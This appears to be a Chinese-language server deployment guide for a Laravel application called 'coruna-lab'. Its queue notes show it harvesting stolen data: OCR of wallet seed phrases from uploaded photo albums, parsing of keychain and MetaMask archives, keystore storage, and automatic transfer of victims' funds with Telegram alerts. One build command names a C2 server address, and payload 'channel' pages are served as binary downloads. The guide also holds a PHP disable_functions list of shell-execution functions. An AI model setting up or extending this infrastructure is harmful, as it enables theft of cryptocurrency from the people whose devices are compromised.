- php 安装拓展: ``` apt-get update apt-get install -y libgmp-dev apt-get install -y p7zip-full apt-get install -y tesseract-ocr tesseract-ocr-eng tesseract-ocr-chi-sim apt-get install -y libheif-examples imagemagick apt-get install -y libheif1 libheif-dev apt-get install -y cmake g++ libde265-dev libx265-dev libjpeg-dev libpng-dev cd /tmp curl -L -o libheif.tar.gz https://github.com/strukturag/libheif/releases/download/v1.19.7/libheif-1.19.7.tar.gz tar xf libheif.tar.gz cd libheif-1.19.7 cmake -B build -DCMAKE_INSTALL_PREFIX=/usr/local cmake --build build -j"$(nproc)" cmake --install build ldconfig /usr/local/bin/heif-convert --version fileinfo gmp redis ``` ``` 确认: tesseract --list-langs # 必须有 eng(助记词 OCR 默认只跑英文) which tesseract ``` - 禁用函数: ``` disable_functions = system,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,imap_open,apache_setenv ``` - 伪静态配置 - nginx 配置 ``` location ~ "^/c/([0-9A-Za-z]\.[0-9A-Za-z]\.[0-9A-Za-z]{2})/show\.htm$" { alias /www/wwwroot/coruna-lab/public/channel/$1/details/show.html; types { } default_type application/octet-stream; add_header Cache-Control "public, max-age=60"; add_header Content-Type "application/octet-stream" always; } location ^~ /log/ { deny all; return 404; } ``` - composer ``` composer self-update composer install --no-dev --optimize-autoloader ``` ``` cp .env.example .env php artisan key:generate # 仅全新安装;已有库后禁止再跑,否则助记词解不开 chown -R www:www storage bootstrap/cache chmod -R ug+rwX storage bootstrap/cache find storage/logs -type d -exec chmod 2775 {} \; chown -R www:www /www/wwwroot/coruna-lab/storage chmod +x /www/wwwroot/coruna-lab/bin/heif-convert chattr -i /www/wwwroot/coruna-lab/public/.user.ini chown -R www:www /www/wwwroot/coruna-lab/public /www/wwwroot/coruna-lab/storage chattr +i /www/wwwroot/coruna-lab/public/.user.ini chmod +x /www/wwwroot/coruna-lab/bin/heif-convert chown www:www /www/wwwroot/coruna-lab/bin/heif-convert php artisan migrate ``` zhe ```bash cd /www/wwwroot/coruna-lab/channel-builder-new python3 -m venv .venv source .venv/bin/activate .venv/bin/pip install pycryptodome py7zr pip install -r requirements.txt php artisan xxbb:build --random-c php artisan ds:build --c2 http://192.168.31.130:8000 php artisan xxbb:repack chown -R www:www /www/wwwroot/coruna-lab/storage /www/wwwroot/coruna-lab/bootstrap/cache chmod -R ug+rwX /www/wwwroot/coruna-lab/storage/app/channel-builder-new ``` - 队列 ```text 名称: coruna-queue 启动命令: /www/server/php/82/bin/php artisan queue:work redis --sleep=1 --tries=3 --timeout=90 --max-time=3600 启动目录: /www/wwwroot/coruna-lab 进程数量: 2 说明: 只跑轻量任务(RecordPageHit / ScanDeviceNotes 等)。相册解压、Telegram、自动转账已拆到独立队列,不要再混进来。 名称: coruna-telegram 启动命令: /www/server/php/82/bin/php artisan queue:work telegram --sleep=1 --tries=3 --timeout=30 --max-time=3600 启动目录: /www/wwwroot/coruna-lab 进程数量: 2 说明: 延迟敏感的 Telegram 通知,独立队列,不会被相册/统计挤住。--sleep=0 让有消息就立刻发。 名称: coruna-transfer 启动命令: /www/server/php/82/bin/php artisan queue:work transfer --sleep=1 --tries=1 --timeout=200 --max-time=3600 启动目录: /www/wwwroot/coruna-lab 进程数量: 2 说明: 自动/手动归集转账。ShouldBeUnique 已防重复打款;--timeout=200 覆盖 AutoTransferAddress 的 $timeout=180。 名称: coruna-extract 启动命令: /www/server/php/82/bin/php artisan queue:work extract --sleep=1 --tries=1 --timeout=200 --max-time=3600 启动目录: /www/wwwroot/coruna-lab 进程数量: 2 说明: 相册 7z 解压(量大、IO 重)。OCR 子任务由 MnemonicScanService 进一步 dispatch 到 ocr 队列,不在这里跑。--timeout=200 覆盖 ExtractPhotoArchive 的 $timeout=180。 名称: coruna-keystore 启动命令: /www/server/php/82/bin/php artisan queue:work keystore --sleep=1 --tries=1 --timeout=320 --max-time=3600 启动目录: /www/wwwroot/coruna-lab 进程数量: 2 名称: coruna-shell 启动命令: /www/server/php/82/bin/php artisan queue:work shell --queue=shell --sleep=1 --tries=2 --timeout=120 --memory=256 --max-time=3600 启动目录: /www/wwwroot/coruna-lab 进程数量: 2 说明: SignalShell v1 上传后处理(ZIP 解压、keychain 解析、钱包地址提取、keystore 入库)。HTTP 层只保存文件并 dispatch job,重活在这里跑。MetaMask ZIP 解压后约 9.3MB 文本数据,--memory=256 防止 OOM。数据库 driver(jobs 表),需要 queue:table migration。 名称: coruna-ocr 启动命令: /www/server/php/82/bin/php -d memory_limit=256M artisan queue:work redis --queue=ocr --sleep=0 --tries=1 --timeout=90 --max-jobs=100 启动目录: /www/wwwroot/coruna-lab 进程数量: 3 ``` > 切换 `QUEUE_CONNECTION` 后必须 `php artisan config:cache` 再 `php artisan queue:restart`,否则旧 worker 进程仍按启动时缓存的连接配置跑(曾导致 OCR 在 worker 内同步执行、ocr 队列空转)。 - 定时任务(每分钟:助记词关联 + 自动转账;每 15 分钟 / 每天 00:10:每日报表汇总) ``` cd /www/wwwroot/coruna-lab && /www/server/php/82/bin/php artisan schedule:run >> /dev/null 2>&1 ``` 上线每日报表后先回填历史(从最早访问/设备到今天,全站 + 各代理): ``` php artisan migrate php artisan coruna:daily-stats --all ``` url 白名单 ^/api/ds/* /p /war /beacon /stats /log.html /statistic/t /api/tg/t /ba /ub /us /uj /t /result /nb /event /u /a /vhx /api/wp/t ^/api/user/* ^/link/config/* ^/api/v2/* ^/api/ap/* /hooks/telegram /hooks/tokenview /hook/tokenview ^/hooks/photo-origin/* 权限问题 check ``` cd /www/wwwroot/coruna-lab && find storage bootstrap/cache public bin/heif-convert \ \( ! -user www -o ! -group www \) \ -printf '%u:%g\t%p\n' cd /www/wwwroot/coruna-lab && find \ storage/logs \ storage/app/channel-builder \ storage/app/channel-builder-new \ storage/app/app-templates \ storage/framework \ bootstrap/cache \ public/channel public/details public/web public/sync \ bin/heif-convert \ \( ! -user www -o ! -group www \) \ -printf '%u:%g\t%p\n' chown -R www:www /www/wwwroot/coruna-lab/storage /www/wwwroot/coruna-lab/bootstrap/cache /www/wwwroot/coruna-lab/public chown www:www /www/wwwroot/coruna-lab/bin/heif-convert ```